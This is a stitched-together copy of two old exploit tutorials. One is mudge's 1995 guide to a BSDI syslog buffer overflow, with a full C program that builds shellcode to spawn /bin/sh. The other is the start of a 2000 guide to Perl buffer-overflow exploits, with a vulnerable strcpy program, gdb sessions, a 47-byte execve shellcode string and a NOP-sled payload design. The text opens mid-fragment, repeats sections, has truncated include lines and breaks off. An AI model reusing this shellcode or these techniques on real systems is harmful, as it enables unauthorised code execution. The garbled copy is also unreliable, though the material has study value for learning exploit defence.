98 'b' 105 'i' 110 'n' 47 '/'
0xc778 : 115 's' 104 'h' 0 '\000' 0 '\000' 0 '\000'


Now go back into your code and put the appropriate addresses in the movl and pushl. At this point you should also be able to put in the appropriate operands for the jmp and call. Congrats... you are done. Here's what the output will look like when you run this on a system with the non patched libc/syslog bug.

bash$ buf
$ exit (do whatever here... you spawned a shell!!!!!! yay!)
bash$


Here's my original program with lot's of comments:

/*****************************************************************/
/* For BSDI running on Intel architecture -mudge, 10/19/95 */
/* by following the above document you should be able to write */
/* buffer overflows for other OS's on other architectures now */
/* mudge@l0pht.com */
/* */
/* note: I haven't cleaned this up yet... it could be much nicer */
/*****************************************************************/

#include

char buffer[4028];

void main () {

int i;

for(i=0; i<2024; i++)
buffer[i]=0x90;


/* should set eip to 0xc73c */

buffer[2024]=0x3c;
buffer[2025]=0xc7;
buffer[2026]=0x00;
buffer[2027]=0x00;

i=2028;

/* begin actuall program */


buffer[i++]=0x89; /* movl %esp, %ebp */
buffer[i++]=0xe5;

buffer[i++]=0x33; /* xorl %eax,%eax */
buffer[i++]=0xc0;

buffer[i++]=0xeb; /* jmp ahead */
buffer[i++]=0x29;

buffer[i++]=0x5e; /* popl %esi */

buffer[i++]=0x59; /* popl %ecx */

buffer[i++]=0xc7; /* movl $0xc770,0xfffffff8(%ebp) */
buffer[i++]=0x45;
buffer[i++]=0xf5;
buffer[i++]=0x70;
buffer[i++]=0xc7;
buffer[i++]=0x00;
buffer[i++]=0x00;

buffer[i++]=0xc7; /* movl $0x0,0xfffffffc(%ebp) */
buffer[i++]=0x45;
buffer[i++]=0xfc;
buffer[i++]=0x00;
buffer[i++]=0x00;
buffer[i++]=0x00;
buffer[i++]=0x00;

buffer[i++]=0x6a; /* pushl $0x0 */
buffer[i++]=0x00;

#ifdef z_out
buffer[i++]=0x8d; /* leal 0xfffffff8(%ebp),%eax */
buffer[i++]=0x45;
buffer[i++]=0xf8;
#endif

/* the above is what the disassembly of execute does... but we only
want to push /bin/sh to be executed... it looks like this leal
puts into eax the address where the arguments are going to be
passed. By pointing to 0xfffffffc(%ebp) we point to a null
and don't care about the args... could probably just load up
the first section movl $0x0,0xfffffff8(%ebp) with a null and
left this part the way it want's to be */

buffer[i++]=0x8d; /* leal 0xfffffffc(%ebp),%eax */
buffer[i++]=0x45;
buffer[i++]=0xfc;


buffer[i++]=0x50; /* pushl %eax */

buffer[i++]=0x68; /* pushl $0xc773 */
buffer[i++]=0x73;
buffer[i++]=0xc7;
buffer[i++]=0x00;
buffer[i++]=0x00;

buffer[i++]=0x8d; /* lea 0x3b,%eax */
buffer[i++]=0x05;
buffer[i++]=0x3b;
buffer[i++]=0x00;
buffer[i++]=0x00;
buffer[i++]=0x00;

buffer[i++]=0x51; /* pushl %ecx */

buffer[i++]=0x9a; /* lcall 0x7,0x0 */
buffer[i++]=0x00;
buffer[i++]=0x00;
buffer[i++]=0x00;
buffer[i++]=0x00;
buffer[i++]=0x07;
buffer[i++]=0x00;

buffer[i++]=0xe8; /* call back to ??? */
buffer[i++]=0xd2;
buffer[i++]=0xff;
buffer[i++]=0xff;
buffer[i++]=0xff;

buffer[i++]='s';
buffer[i++]='h';
buffer[i++]=0x00;
buffer[i++]='/';
buffer[i++]='b';
buffer[i++]='i';
buffer[i++]='n';
buffer[i++]='/';
buffer[i++]='s';
buffer[i++]='h';
buffer[i++]=0x00;
buffer[i++]=0x00;

syslog(LOG_ERR, buffer);
}



Copyright 1995, 1996 LHI Technologies, All Rights Reserved


HOW TO WRITE BUFFER OVERFLOWS
Copyright © by Mudge October 20, 1995

This is really rough, and some of it is not needed. I wrote this as a reminder note to myself as I really didn't want to look at any more AT&T assembly again for a while and was afraid I would forget what I had done. If you are an old assembly guru then you might scoff at some of this… oh well, it works and that's a hack in itself. — mudge@l0pht.com

test out the program (duh).

--------syslog_test_1.c------------

#include

char buffer[4028];

void main() {

int i;

for (i=0; i<=4028; i++)
buffer[i]='A';

syslog(LOG_ERR, buffer);
}

--------end syslog_test_1.c----------

Compile the program and run it. Make sure you include the symbol table for the debugger or not… depending upon how macho you feel today.

bash$ gcc -g buf.c -o buf
bash$ buf
Segmentation fault (core dumped)

The 'Segmentation fault (core dumped)' is what we wanted to see. This tells us there is definately an attempt to access some memory address that we shouldn't. If you do much in 'C' with pointers on a unix machine you have probably seen this (or Bus error) when pointing or dereferencing incorrectly.

Fire up gdb on the program (with or without the core file). Assuming you remove the core file (this way you can learn a bit about gdb), the steps would be as follows:

bash$ gdb buf
(gdb) run
Starting program: /usr2/home/syslog/buf

Program received signal 11, Segmentation fault
0x1273 in vsyslog (0x41414141, 0x41414141, 0x41414141, 0x41414141)

Ok, this is good. The 41's you see are the hex equivalent for the ascii character 'A'. We are definately going places where we shouldn't be.

(gdb) info all-registers
eax 0xefbfd641 -272640447
ecx 0x00000000 0
edx 0xefbfd67c -272640388
ebx 0xefbfe000 -272637952
esp 0xefbfd238 0xefbfd238
ebp 0xefbfde68 0xefbfde68
esi 0xefbfd684 -272640380
edi 0x0000cce8 52456
eip 0x00001273 0x1273
ps 0x00010212 66066
cs 0x0000001f 31
ss 0x00000027 39
ds 0x00000027 39
es 0x00000027 39
fs 0x00000027 39
gs 0x00000027 39

The gdb command 'info all-registers' shows the values in the current hardware registers. The one we are really interested in is 'eip'. On some platforms this will be called 'ip' or 'pc'. It is the Instruction Pointer [also called Program Counter]. It points to the memory location of the next instruction the processor will execute. By overwriting this you can point to the beginning of your own code and the processor will merrily start executing it assuming you have it written as native opcodes and operands.

In the above we haven't gotten exactly where we need to be yet. If you want to see where it crashed out do the following:

(gdb) disassemble 0x1273
[stuff deleted]
0x1267 : incl 0xfffff3dc(%ebp)
0x126d : testb %al,%al
0x126f : jne 0x125c
0x1271 : jmp 0x1276
0x1273 : movb %al,(%ebx)
0x1275 : incl %ebx
0x1276 : incl %edi
0x1277 : movb (%edi),%al
0x1279 : testb %al,%al

If you are familiar with microsoft assembler this will be a bit backwards to you. For example: in microsoft you would 'mov ax,cx' to move cx to ax. In AT&T 'mov ax,cx' moves ax to cx. So put on those warp refraction eye-goggles and on we go.

Note also that Intel assembler

let's go back and tweak the original source code some eh?

-------------syslog_test_2.c-------------

#include

char buffer[4028];

void main() {

int i;

for (i=0; i<2024; i++)
buffer[i]='A';

syslog(LOG_ERR, buffer);
}

-----------end syslog_test_2.c-------------

We're just shortening the length of 'A''s.

bash$ gcc -g buf.c -o buf
bash$ gdb buf
(gdb) run
Starting program: /usr2/home/syslog/buf

Program received signal 5, Trace/BPT trap
0x1001 in ?? (Error accessing memory address 0x41414149: Cannot
allocate memory.

This is the magic response we've been looking for.

(gdb) info all-registers
eax 0xffffffff -1
ecx 0x00000000 0
edx 0x00000008 8
ebx 0xefbfdeb4 -272638284
esp 0xefbfde70 0xefbfde70
ebp 0x41414141 0x41414141 <- here it is!!!
esi 0xefbfdec0 -272638272
edi 0xefbfdeb8 -272638280
eip 0x00001001 0x1001
ps 0x00000246 582
cs 0x0000001f 31
ss 0x00000027 39
ds 0x00000027 39
es 0x00000027 39
fs 0x00000027 39
gs 0x00000027 39

Now we move it along until we figure out where eip lives in the overflow (which is right after ebp in this arch architecture). With that known fact we only have to add 4 more bytes to our buffer of 'A''s and we will overwrite eip completely.

---------syslog_test_3.c----------------

#include

char buffer[4028];

void main() {

int i;

for (i=0; i<2028; i++)
buffer[i]='A';

syslog(LOG_ERR, buffer);
}
-------end syslog_test_3.c------------

bash$ !gc
gcc -g buf.c -o buf
bash$ gdb buf
(gdb) run
Starting program: /usr2/home/syslog/buf

Program received signal 11, Segmentation fault
0x41414141 in errno (Error accessing memory address
0x41414149: Cannot allocate memory.


(gdb) info all-registers
eax 0xffffffff -1
ecx 0x00000000 0
edx 0x00000008 8
ebx 0xefbfdeb4 -272638284
esp 0xefbfde70 0xefbfde70
ebp 0x41414141 0x41414141
esi 0xefbfdec0 -272638272
edi 0xefbfdeb8 -272638280
eip 0x41414141 0x41414141
ps 0x00010246 66118
cs 0x0000001f 31
ss 0x00000027 39
ds 0x00000027 39
es 0x00000027 39
fs 0x00000027 39
gs 0x00000027 39

BINGO!!!

Here's where it starts to get interesting. Now that we know eip starts at buffer[2024] and goes through buffer[2027] we can load it up with whatever we need. The question is… what do we need?

We find this by looking at the contents of buffer[].

(gdb) disassemble buffer
[stuff deleted]
0xc738 : incl %ecx
0xc739 : incl %ecx
0xc73a : incl %ecx
0xc73b : incl %ecx
0xc73c : addb %al,(%eax)
0xc73e : addb %al,(%eax)
0xc740 : addb %al,(%eax)
[stuff deleted]

On the Intel x86 architecture [a pentium here but that doesn't matter] incl %eax is opcode 0100 0001 or 41hex. addb %al,(%eax) is 0000 0000 or 0x0 hex. We will load up buffer[2024] to buffer[2027] with the address of 0xc73c where we will start our code. You have two options here, one is to load the buffer up with the opcodes and operands and point the eip back into the buffer; the other option is what we are going to be doing which is to put the opcodes and operands after the eip and point to them.

The advantage to putting the code inside the buffer is that other than the ebp and eip registers you don't clobber anything else. The disadvantage is that you will need to do trickier coding (and actually write the assembly yourself) so that there are no bytes that contain 0x0 which will look like a null in the string. This will require you to know enough about the native chip architecture and opcodes to do this [easy enough for some people on Intel x86's but what happens when you run into an Alpha? -- lucky for us there is a gdb for Alpha I think ;-)].

The advantage to putting the code after the eip is that you don't have to worry about bytes containing 0x0 in them. This way you can write whatever program you want to execute in 'C' and have gdb generate most of the machine code for you. The disadvantage is that you are overwriting the great unknown. In most cases the section you start to overwrite here contains your environment variables and other whatnots… upon succesfully running your created code you might be dropped back into a big void. Deal with it.

The safest instruction is NOP which is a benign no-operation. This is what you will probably be loading the buffer up with as filler.

Ahhh but what if you don't know what the opcodes are for the particular architecture you are on. No problem. gcc has a wonderfull function called __asm__(char *); I rely upon this heavily for doing buffer overflows on architectures that I don't have assembler books for.

------nop.c--------
void main(){

__asm__("nop\n");

}
----end nop.c------

bash$ gcc -g nop.c -o nop
bash$ gdb nop
(gdb) disassemble main
Dump of assembler code for function main:
to 0x1088:
0x1080
: pushl %ebp
0x1081 : movl %esp,%ebp
0x1083 : nop
0x1084 : leave
0x1085 : ret
0x1086 : addb %al,(%eax)
End of assembler dump.
(gdb) x/bx 0x1083
0x1083 : 0x90

Since nop is at 0x1083 and the next instruction is at 0x1084 we know that nop only takes up one byte. Examining that byte shows us that it is 0x90 (hex).

Our program now looks like this:

------ syslog_test_4.c---------

#include

char buffer[4028];

void main() {

int i;

for (i=0; i<2024; i++)
buffer[i]=0x90;

i=2024;

buffer[i++]=0x3c;
buffer[i++]=0xc7;
buffer[i++]=0x00;
buffer[i++]=0x00;


syslog(LOG_ERR, buffer);
}
------end syslog_test_4.c-------

Notice you need to load the eip backwards ie 0000c73c is loaded into the buffer as 3c c7 00 00.

Now the question we have is what is the code we insert from here on?

Suppose we want to run /bin/sh? Gee, I don't have a friggin clue as to why someone would want to do something like this, but I hear there are a lot of nasty people out there. Oh well. Here's the proggie we want to execute in C code:

------execute.c--------
#include
main()
{
char *name[2];
name[0] = "sh";
name[1] = NULL;
execve("/bin/sh",name,NULL);
}
----end execute.c-------

bash$ gcc -g execute.c -o execute
bash$ execute
$

Ok, the program works. Then again, if you couldn't whip up that little prog you should probably throw in the towel here. Maybe become a webmaster or something that requires little to no programming (or brainwave activity period). Here's the gdb scoop:

bash$ gdb execute
(gdb) disassemble main
Dump of assembler code for function main:
to 0x10b8:
0x1088
: pushl %ebp
0x1089 : movl %esp,%ebp
0x108b : subl $0x8,%esp
0x108e : movl $0x1080,0xfffffff8(%ebp)
0x1095 : movl $0x0,0xfffffffc(%ebp)
0x109c : pushl $0x0
0x109e : leal 0xfffffff8(%ebp),%eax
0x10a1 : pushl %eax
0x10a2 : pushl $0x1083
0x10a7 : call 0x10b8
0x10ac : leave
0x10ad : ret
0x10ae : addb %al,(%eax)
0x10b0 : jmp 0x1140
0x10b5 : addb %al,(%eax)
0x10b7 : addb %cl,0x3b05(%ebp)
End of assembler dump.

(gdb) disassemble execve
Dump of assembler code for function execve:
to 0x10c8:
0x10b8 : leal 0x3b,%eax
0x10be : lcall 0x7,0x0
0x10c5 : jb 0x10b0
0x10c7 : ret
End of assembler dump.

This is the assembly behind what our execute program does to run /bin/sh. We use execve() as it is a system call and this is what we are going to have our program execute (ie let the kernel service run it as opposed to having to write it from scratch).

0x1083 contains the /bin/sh string and is the last thing pushed onto the stack before the call to execve.

(gdb) x/10bc 0x1083
0x1083 : 47 '/' 98 'b' 105 'i' 110 'n' 47 '/' 115 's'
104 'h' 0 '\000'

(0x1080 contains the arguments … which I haven't been able to really clean up).

We will replace this address with the one where our string lives [when we decide where that will be].

Here's the skeleton we will use from the execve disassembly:

[main]
0x108d : movl %esp,%ebp

0x108e : movl $0x1083,0xfffffff8(%ebp)
0x1095 : movl $0x0,0xfffffffc(%ebp)
0x109c : pushl $0x0
0x109e : leal 0xfffffff8(%ebp),%eax
0x10a1 : pushl %eax
0x10a2 : pushl $0x1080

[execve]
0x10b8 : leal 0x3b,%eax
0x10be : lcall 0x7,0x0

All you need to do from here is to build up a bit of an environment for the program. Some of this stuff isn't necesary but I have it in still as I haven't fine tuned this yet.

I clean up eax. I don't remember why I do this and it shouldn't really be necesarry. Hell, better quit hitting the sauce. I'll figure out if it is after I tune this up a bit.

xorl %eax,%eax

We will encapsulate the actuall program with a jmp to somewhere and a call right back to the instruction after the jmp. This pushes ecx and esi onto the stack.

jmp 0x???? # this will jump to the call…
popl %esi
popl %ecx

The call back will be something like:

call 0x???? # this will point to the instruction after the jmp (ie
# popl %esi)

All put together it looks like this now:

----------------------------------------------------------------------
movl %esp,%ebp
xorl %eax,%eax
jmp 0x???? # we don't know where yet…
# -------------[main]
movl $0x????,0xfffffff8(%ebp) # we don't know what the address will
# be yet.
movl $0x0,0xfffffffc(%ebp)
pushl $0x0
leal 0xfffffff8(%ebp),%eax
pushl %eax
pushl $0x???? # we don't know what the address will
# be yet.
# ------------[execve]
leal 0x3b,%eax
lcall 0x7,0x0

call 0x???? # we don't know where yet…

----------------------------------------------------------------------

There are only a couple of more things that we need to add before we fill in the addresses to a couple of the instructions.

Since we aren't actually calling execve with a 'call' anymore here, we need to push the value in ecx onto the stack to simulate it.

# ------------[execve]
pushl %ecx
leal 0x3b,%eax
lcall 0x7,0x0

The only other thing is to not pass in the arguments to /bin/sh. We do this by changing the ' leal 0xfffffff8(%ebp),%eax' to ' leal 0xfffffffc(%ebp),%eax' [remember 0x0 was moved there].

So the whole thing looks like this (without knowing the addresses for the '/bin/sh\0' string):

movl %esp,%ebp
xorl %eax,%eax # we added this
jmp 0x???? # we added this
popl %esi # we added this
popl %ecx # we added this
movl $0x????,0xfffffff5(%ebp)
movl $0x0,0xfffffffc(%ebp)
pushl $0x0
leal 0xfffffffc(%ebp),%eax # we changed this
pushl %eax
pushl $0x????
leal 0x3b,%eax
pushl %ecx # we added this
lcall 0x7,0x0
call 0x???? # we added this

To figure out the bytes to load up our buffer with for the parts that were already there run gdb on the execute program.

bash$ gdb execute
(gdb) disassemble main
Dump of assembler code for function main:
to 0x10bc:
0x108c
: pushl %ebp
0x108d : movl %esp,%ebp
0x108f : subl $0x8,%esp
0x1092 : movl $0x1080,0xfffffff8(%ebp)
0x1099 : movl $0x0,0xfffffffc(%ebp)
0x10a0 : pushl $0x0
0x10a2 : leal 0xfffffff8(%ebp),%eax
0x10a5 : pushl %eax
0x10a6 : pushl $0x1083
0x10ab : call 0x10bc
0x10b0 : leave
0x10b1 : ret
0x10b2 : addb %al,(%eax)
0x10b4 : jmp 0x1144
0x10b9 : addb %al,(%eax)
0x10bb : addb %cl,0x3b05(%ebp)
End of assembler dump.

[get out your scratch paper for this one… ]

0x108d : movl %esp,%ebp
this goes from 0x108d to 0x108e. 0x108f starts the next instruction.
thus we can see the machine code with gdb like this.

(gdb) x/2bx 0x108d
0x108d : 0x89 0xe5

Now we know that buffer[2028]=0x89 and buffer[2029]=0xe5. Do this for all of the instructions that we are pulling out of the execute program. You can figure out the basic structure for the call command by looking at the one inexecute that calls execve. Of course you will eventually need to put in the proper address.

When I work this out I break down the whole program so I can see what's going on. Something like the following

0x108c
: pushl %ebp
0x108d : movl %esp,%ebp
0x108f : subl $0x8,%esp

(gdb) x/bx 0x108c
0x108c
: 0x55
(gdb) x/bx 0x108d
0x108d : 0x89
(gdb) x/bx 0x108e
0x108e : 0xe5
(gdb) x/bx 0x108e
0x108f : 0x83

so we see the following from this:

0x55 pushl %ebp

0x89 movl %esp,%ebp
0xe5

0x83 subl $0x8,%esp

etc. etc. etc.

For commands that you don't know the opcodes to you can find them out for the particular chip you are on by writing little scratch programs.

----pop.c-------
void main() {

__asm__("popl %esi\n");

}
---end pop.c----

bash$ gcc -g pop.c -o pop
bash$ gdb pop
(gdb) disassemble main
Dump of assembler code for function main:
to 0x1088:
0x1080
: pushl %ebp
0x1081 : movl %esp,%ebp
0x1083 : popl %esi
0x1084 : leave
0x1085 : ret
0x1086 : addb %al,(%eax)
End of assembler dump.
(gdb) x/bx 0x1083
0x1083 : 0x5e

So, 0x5e is popl %esi. You get the idea. After you have gotten this far build the string up (put in bogus addresses for the ones you don't know in the jmp's and call's… just so long as we have the right amount of space being taken up by the jmp and call instructions… likewise for the movl's where we will need to know the memory location of 'sh\0\0/bin/sh\0'.

After you have built up the string, tack on the chars for sh\0\0/bin/sh\0.

Compile the program and load it into gdb. Before you run it in gdb set a break point for the syslog call.

(gdb) break syslog
Breakpoint 1 at 0x1463
(gdb) run
Starting program: /usr2/home/syslog/buf

Breakpoint 1, 0x1463 in syslog (0x00000003, 0x0000bf50, 0x0000082c,
0xefbfdeac)
(gdb) disassemble 0xc73c 0xc77f
(we know it will start at 0xc73c since thats right after the
eip overflow… 0xc77f is just an educated guess as to where
it will end)

(gdb) disassemble 0xc73c 0xc77f
Dump of assembler code from 0xc73c to 0xc77f:
0xc73c : movl %esp,%ebp
0xc73e : xorl %eax,%eax
0xc740 : jmp 0xc76b
0xc742 : popl %esi
0xc743 : popl %ecx
0xc744 : movl $0xc770,0xfffffff5(%ebp)
0xc74b : movl $0x0,0xfffffffc(%ebp)
0xc752 : pushl $0x0
0xc754 : leal 0xfffffffc(%ebp),%eax
0xc757 : pushl %eax
0xc758 : pushl $0xc773
0xc75d : leal 0x3b,%eax
0xc763 : pushl %ecx
0xc764 : lcall 0x7,0x0
0xc76b : call 0xc742
0xc770 : jae 0xc7da
0xc772 : addb %ch,(%edi)
0xc774 : boundl 0x6e(%ecx),%ebp
0xc777 : das
0xc778 : jae 0xc7e2
0xc77a : addb %al,(%eax)
0xc77c : addb %al,(%eax)
0xc77e : addb %al,(%eax)
End of assembler dump.

Look for the last instruction in your code. In this case it was the 'call' to right after the 'jmp' near the beginning. Our data should be right after it and indeed we see that it is.

(gdb) x/13bc 0xc770
0xc770 : 115 's' 104 'h' 0 '\000' 47 '/'
98 'b' 105 'i' 110 'n' 47 '/'
0xc778 : 115 's' 104 'h' 0 '\000' 0 '\000' 0 '\000'

Now go back into your code and put the appropriate addresses in the movl and pushl. At this point you should also be able to put in the appropriate operands for the jmp and call. Congrats… you are done. Here's what the output will look like when you run this on a system with the non patched libc/syslog bug.

bash$ buf
$ exit (do whatever here… you spawned a shell!!!!!! yay!)
bash$

Here's my original program with lot's of comments:

/*****************************************************************/
/* For BSDI running on Intel architecture -mudge, 10/19/95 */
/* by following the above document you should be able to write */
/* buffer overflows for other OS's on other architectures now */
/* mudge@l0pht.com */
/* */
/* note: I haven't cleaned this up yet… it could be much nicer */
/*****************************************************************/

#include

char buffer[4028];

void main () {

int i;

for(i=0; i<2024; i++)
buffer[i]=0x90;


/* should set eip to 0xc73c */

buffer[2024]=0x3c;
buffer[2025]=0xc7;
buffer[2026]=0x00;
buffer[2027]=0x00;

i=2028;

/* begin actuall program */


buffer[i++]=0x89; /* movl %esp, %ebp */
buffer[i++]=0xe5;

buffer[i++]=0x33; /* xorl %eax,%eax */
buffer[i++]=0xc0;

buffer[i++]=0xeb; /* jmp ahead */
buffer[i++]=0x29;

buffer[i++]=0x5e; /* popl %esi */

buffer[i++]=0x59; /* popl %ecx */

buffer[i++]=0xc7; /* movl $0xc770,0xfffffff8(%ebp) */
buffer[i++]=0x45;
buffer[i++]=0xf5;
buffer[i++]=0x70;
buffer[i++]=0xc7;
buffer[i++]=0x00;
buffer[i++]=0x00;

buffer[i++]=0xc7; /* movl $0x0,0xfffffffc(%ebp) */
buffer[i++]=0x45;
buffer[i++]=0xfc;
buffer[i++]=0x00;
buffer[i++]=0x00;
buffer[i++]=0x00;
buffer[i++]=0x00;

buffer[i++]=0x6a; /* pushl $0x0 */
buffer[i++]=0x00;

#ifdef z_out
buffer[i++]=0x8d; /* leal 0xfffffff8(%ebp),%eax */
buffer[i++]=0x45;
buffer[i++]=0xf8;
#endif

/* the above is what the disassembly of execute does… but we only
want to push /bin/sh to be executed… it looks like this leal
puts into eax the address where the arguments are going to be
passed. By pointing to 0xfffffffc(%ebp) we point to a null
and don't care about the args… could probably just load up
the first section movl $0x0,0xfffffff8(%ebp) with a null and
left this part the way it want's to be */

buffer[i++]=0x8d; /* leal 0xfffffffc(%ebp),%eax */
buffer[i++]=0x45;
buffer[i++]=0xfc;


buffer[i++]=0x50; /* pushl %eax */

buffer[i++]=0x68; /* pushl $0xc773 */
buffer[i++]=0x73;
buffer[i++]=0xc7;
buffer[i++]=0x00;
buffer[i++]=0x00;

buffer[i++]=0x8d; /* lea 0x3b,%eax */
buffer[i++]=0x05;
buffer[i++]=0x3b;
buffer[i++]=0x00;
buffer[i++]=0x00;
buffer[i++]=0x00;

buffer[i++]=0x51; /* pushl %ecx */

buffer[i++]=0x9a; /* lcall 0x7,0x0 */
buffer[i++]=0x00;
buffer[i++]=0x00;
buffer[i++]=0x00;
buffer[i++]=0x00;
buffer[i++]=0x07;
buffer[i++]=0x00;

buffer[i++]=0xe8; /* call back to ??? */
buffer[i++]=0xd2;
buffer[i++]=0xff;
buffer[i++]=0xff;
buffer[i++]=0xff;

buffer[i++]='s';
buffer[i++]='h';
buffer[i++]=0x00;
buffer[i++]='/';
buffer[i++]='b';
buffer[i++]='i';
buffer[i++]='n';
buffer[i++]='/';
buffer[i++]='s';
buffer[i++]='h';
buffer[i++]=0x00;
buffer[i++]=0x00;

syslog(LOG_ERR, buffer);
}



Writing Buffer Overflow Exploits with Perl


-- Writing Buffer Overflow Exploits with Perl - anno 2000 --
- http://teleh0r.cjb.net/
==============================================================



Table of Contents:
~~~~~~~~~~~~~~~~~~~~

[ 1. Introduction
[ 2. Vulnerable Program Example
[ 3. Shellcode

[ 4. Designing the payload
[ 5. Explained Example Exploit
[ 6. Old Remote Imapd example exploit

[ 7. Links & Resources

-----------------------------------------------------------------------------

Introduction:
~~~~~~~~~~~~~~~

This paper is for those who want a practical approach to writing buffer overflow
exploits. As the title says, this text will teach you how to write these exploits
in Perl.

If you want a more in-depth guide, please take a look at the links provided at the
end of this paper, and read those instead.


Vulnerable Program Example:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Ok, time for a example. I have written a small program which is exploitable to a
buffer overflow. strcpy() does not check the length of $KIDVULN before it starts
placing its contents onto the stack, thus making the below program exploitable.

-----------------------------------------------------------------------------
++ vuln.c

#include
int main() {
char kidbuffer[1024];

if (getenv("KIDVULN") == NULL) {
fprintf(stderr, "Grow up!\n");
exit(1);
}

/* Read the environment variable data into the buffer */
strcpy(kidbuffer, (char *)getenv("KIDVULN"));

printf("Environment variable KIDVULN is:\n\"%s\".\n\n", kidbuffer);
printf("Isn't life wonderful in kindergarten?\n");
return 0;
}

++ end
-----------------------------------------------------------------------------

[root@localhost teleh0r]# gcc -o vuln vuln.c
vuln.c: In function `main':
vuln.c:5: warning: comparison between pointer and integer
[root@localhost teleh0r]# export KIDVULN=`perl -e '{print "A"x"1028"}'`
[root@localhost teleh0r]# gdb vuln
GNU gdb 19991004
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i386-redhat-linux"...
(gdb) r
Starting program: /home/teleh0r/vuln
Environment variable KIDVULN is:
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA



Isn't life wonderful in kindergarten?

Program received signal SIGSEGV, Segmentation fault.
0x40032902 in __libc_start_main (main=Cannot access memory at address 0x41414149
) at ../sysdeps/generic/libc-start.c:61
61 ../sysdeps/generic/libc-start.c: No such file or directory.
(gdb)

-----------------------------------------------------------------------------

Ok, here we can see that our buffer size wasn't big enough. Had it been, then
the stack pointer would have been overwritten and the EIP register would have
been 0x41414141. (41 == A in hex.)

-----------------------------------------------------------------------------

[root@localhost teleh0r]# export KIDVULN=`perl -e '{print "A"x"1032"}'`
[root@localhost teleh0r]# gdb vuln
GNU gdb 19991004
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i386-redhat-linux"...
(gdb) r
Starting program: /home/teleh0r/vuln
Environment variable KIDVULN is:
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA



Isn't life wonderful in kindergarten?

Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb)

-----------------------------------------------------------------------------

Now, we have totally overwritten the old return adress. We now see that it
holds 4 A's. So what does this mean? Well, we can controll where EIP points to,
and therefore we can get EIP to point to our payload. If this is successful our
code will get executed on the stack.

(Some operative systems/patches may prevent code being executed on the stack).

-----------------------------------------------------------------------------

We now know the length we will use to completely overwrite the return address.
Since ESP points to the top of the stack, we can use the value of ESP when the
program died, and (if needed) add a offset to it.

This is how you get the stack pointer value to use your exploit.

Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb) info reg esp
esp 0xbffff770 -1073744064
(gdb)

-----------------------------------------------------------------------------

Shellcode:
~~~~~~~~~~~~

If you want to learn how to write your own shellcode, please take a look at the
links provided at the end of this paper. If you are lazy, and since you code in
Perl, chances are high, you could use tools which will make the shellcode for you.
Hellkit and execve-shell are good examples of such programs (great tools).

(You will find these tools at: http://teso.scene.at/)

[root@localhost execve-shell]# ./shellxp /bin/sh
build exploit shellcode
-scut / teso.

constructing shellcode...

[ 39/2048] adding ( 7): /bin/sh
shellcode size: 47 bytes

/* 47 byte shellcode */
"\xeb\x1f\x5f\x89\xfc\x66\xf7\xd4\x31\xc0\x8a\x07"
"\x47\x57\xae\x75\xfd\x88\x67\xff\x48\x75\xf6\x5b"
"\x53\x50\x5a\x89\xe1\xb0\x0b\xcd\x80\xe8\xdc\xff"
"\xff\xff\x01\x2f\x62\x69\x6e\x2f\x73\x68\x01";

-----------------------------------------------------------------------------

Designing the payload:
~~~~~~~~~~~~~~~~~~~~~~~~

The payload will be stored in the $buffer scalar, with the data which will be
used for the exploitation. It will have the length needed to completely overwrite
the old return address. We will insert this code into the targeted program
(user-input) in order to change its flow.

The payload will in most cases look like this:

N = NOP (0x90) / S = Shellcode / R = ESP (+ offset).

Buffer: [ NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNSSSSSSSRRRRRRRRRRRRRR ]

There are reasons why we construct the buffer this way. First we have a lot of
NOPs, then the shellcode (which in this example will execute /bin/sh), and at last
the ESP + offset values.

The EIP register will get loaded with the value pointed to by ESP. So if ESP
points to anywhere inside the NOPs, the NOPs will do "no operations", and
continue to do nothing until the processor reaches the shellcode and then
executes it. (See the figure below)

_______________________________________________
<---- |[ NNNNNNNNNNNNNNNNNNNNNNNNNNN-SHELLCODE-RRRRRRR ]| <----
\_________________________/ ----> # ^
^ |
|________________________________|


If the buffer we were trying to overflow had been too small to add a decent
amount of NOP's, the shellcode and RET's, the below layout could have been
used when constructing the payload. (We could have added the NOP's and shellcode
into a shell-variable as well)

(R = Stack Pointer + Offset / S = Shellcode / N = x86 NOP)

